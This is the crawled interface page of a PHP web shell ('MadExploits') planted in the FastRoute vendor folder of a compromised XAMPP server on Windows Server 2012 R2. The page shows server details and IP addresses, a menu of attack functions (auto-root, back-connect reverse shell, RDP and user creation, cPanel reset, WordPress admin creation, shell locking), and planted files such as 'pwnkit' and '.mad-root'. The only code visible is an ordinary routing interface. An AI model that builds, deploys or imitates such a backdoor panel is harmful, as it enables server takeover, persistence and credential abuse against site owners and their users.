Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.139
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
vendor /
nikic /
fast-route /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
DataGenerator
[ DIR ]
drwxrwxrwx
Dispatcher
[ DIR ]
drwxrwxrwx
RouteParser
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
BadRouteException.php
81
B
-rw-rw-rw-
DataGenerator.php
682
B
-rw-rw-rw-
Dispatcher.php
594
B
-rw-rw-rw-
Route.php
921
B
-rw-rw-rw-
RouteCollector.php
3.77
KB
-rw-rw-rw-
RouteParser.php
1.01
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
bootstrap.php
294
B
-rw-rw-rw-
functions.php
2.49
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Dispatcher.php
<?php namespace FastRoute; interface Dispatcher { const NOT_FOUND = 0; const FOUND = 1; const METHOD_NOT_ALLOWED = 2; /** * Dispatches against the provided HTTP method verb and URI. * * Returns array with one of the following formats: * * [self::NOT_FOUND] * [self::METHOD_NOT_ALLOWED, ['GET', 'OTHER_ALLOWED_METHODS']] * [self::FOUND, $handler, ['varName' => 'value', ...]] * * @param string $httpMethod * @param string $uri * * @return array */ public function dispatch($httpMethod, $uri); }
Close